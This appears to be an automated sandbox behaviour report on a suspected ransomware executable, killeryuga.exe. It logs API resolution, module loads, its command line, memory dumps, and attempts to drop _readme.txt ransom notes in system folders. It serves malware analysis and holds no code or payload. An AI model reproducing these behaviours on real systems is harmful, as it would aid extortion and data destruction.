Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\Config.Msi\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\Recovery\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\System Volume Information\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
File Create filename = C:\Boot\BCD.LOG, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Process #18: killeryuga.exe
1671 7
»
Information Value
ID #18
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:30
OS Process Information
»
Information Value
PID 0x588
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 554
0x 380
0x 300
0x 348
0x 140
0x 268
0x 30C
0x 308
0x 7A8
0x 7AC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x009543E8 0x0098374E Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00410695 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
...
Threads
Thread 0x554
589 7
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76a80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x76ac439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x754aed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
